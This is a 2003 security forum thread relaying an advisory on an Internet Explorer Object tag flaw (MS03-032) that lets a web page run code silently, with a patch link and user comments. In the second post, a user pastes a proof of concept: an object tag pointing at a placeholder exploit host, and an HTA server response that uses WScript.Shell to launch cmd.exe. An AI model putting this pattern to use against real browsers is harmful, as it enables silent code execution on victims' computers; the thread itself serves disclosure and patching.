New Hole In M$ IE
Results 1 to 6 of 6

Thread: New Hole In M$ IE

  1. #1
    Senior Member
    Join Date
    May 2003
    Posts
    472

    New Hole In M$ IE

    Release Date:
    August 20, 2003

    Severity:

    High (Remote Code Execution)

    Systems Affected:

    Microsoft Internet Explorer 5.01

    Microsoft Internet Explorer 5.5

    Microsoft Internet Explorer 6.0

    Microsoft Internet Explorer 6.0 for Windows Server 2003


    Description:

    eEye Digital Security has discovered a security vulnerability in Microsoft's Internet Explorer that would allow executable code to run automatically upon rendering malicious HTML.

    This is a flaw in Microsoft's primary contribution to HTML, the Object tag, which is used to embed basically all ActiveX into HTML pages. The parameter that specifies the remote location of data for objects is not checked to validate the nature of the file being loaded, and therefore trojan executables may be run from within a webpage as silently and as easily as Internet Explorer parses image files or any other "safe" HTML content.

    This attack may be utilized wherever IE parses HTML, including websites, email, newsgroups, and within applications utilizing web-browsing functionality.

    Note:

    On Windows 2003 Internet Explorer, this vulnerability is noted as being "moderate" rather than "critical." This is because of Windows 2003's "Enhanced Security Configuration Mode", in which Microsoft sets the "Disable ActiveX" option in Internet Explorer's Security Properties by default. Windows 2003 Internet Explorer also disables by default: Visual Basic Script, Javascript, input forms, and the ability to download files.

    Due to the popularity and prevalence of ActiveX on the Internet, users running Windows 2003 "Enhanced Security Configuration" Mode may have chosen to reactivate the ability to view active content. These users should be aware that they are at critical risk for this vulnerability and should apply the necessary patch.

    As a final note, Microsoft attributes credit to eEye for this vulnerability, but incorrectly refers to it as the "Object Type" bug. The "Object Type" bug is in fact eEye's previously discovered object tag vulnerability. That issue involved a stack-based overflow in the "Type" property, and this current issue involves incorrect handling of the data specified by the "Data" tag.
    Source Here : http://www.zone-h.org/en/advisories/read/id=2913/

    M$ Patch Here : Microsoft was notified and has released a patch for this vulnerability. The patch is available at: http://www.microsoft.com/technet/sec...n/MS03-032.asp
    guru@linux:~> who I grep -i blonde I talk; cd ~; wine; talk; touch; unzip; touch; strip; gasp; finger; mount; fsck; more; yes; gasp; umount; make clean; sleep;

  2. #2
    Senior Member tampabay420's Avatar
    Join Date
    Aug 2002
    Posts
    953
    don't forget the fun stuff

    Code:
    Technical Description:
    
    --------------Client HTTP request---------------------------
    <html>
    ...
    <object data="www.yourinternethost.com/yourexploitwebpageorcgi.html">
    </object>
    </html>
    ------------------------------------------------------------
    
    -------------Server HTTP Response---------------------------
    HTTP/1.1 200 OK
    Date: Tue, 13 May 2003 18:06:43 GMT
    Server: Apache
    Content-Type: application/hta
    Content-Length: 191
    
    <html>
    <object id='wsh'
    classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>
    <script>
    wsh.Run("cmD.exe /k echO so loNg, and ThaNks For all yoUr EmplOyeeS");
    </script>
    </html>
    ------------------------------------------------------------
    yeah, I\'m gonna need that by friday...

  3. #3
    Senior Member
    Join Date
    May 2003
    Posts
    472
    that would have made my post much long....but this part is available in the link i have given...

    nJoy
    guru@linux:~> who I grep -i blonde I talk; cd ~; wine; talk; touch; unzip; touch; strip; gasp; finger; mount; fsck; more; yes; gasp; umount; make clean; sleep;

  4. #4
    Junior Member
    Join Date
    Jul 2003
    Posts
    26
    Actually, M$ just released a patch for XP home systems that should target that vulnerability. I havent installed it on my system yet because well, we all know how irreputibly reliable M$ patches are.
    Release a bomb filled with Ritalin and Pharmacy death. Keep the rich above in the hills where the impact will not reach them. Then go for the ironic statement and call it a cure for pollution.

  5. #5
    AO BOFH: Luser Abuser BModeratorFH gore's Avatar
    Join Date
    Oct 2002
    Location
    Michigan
    Posts
    7,177
    This is another reason why I havnt put my Windows box online in about a month now. Maybe after they release enough patches to actually fix this I will actually use it online. Between MSBlast and holes that would be enough to make a decent golf course I havnt put the XP box online in a while. The only box Iv had online is This one which is Slackware, and a few days ago was Free BSD. youd think Microsoft would fix these or at least start making golf courses, a thing people actually want holes in.
    Kill the lights, let the candles burn behind the pumpkins’ mischievous grins, and let the skeletons dance. For one thing is certain, The Misfits have returned and once again everyday is Halloween.The Misfits FreeBSD
    Cannibal Holocaust
    SuSE Linux
    Slackware Linux

  6. #6
    Member
    Join Date
    Nov 2002
    Posts
    80
    <rant> I noticed this show up as an update this morning I think. I wouldn't mind so much if IE wasn't tied into other programs that I use like MSN Mesenger, why can't they use the default browser, long live Mozilla! </rant>

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •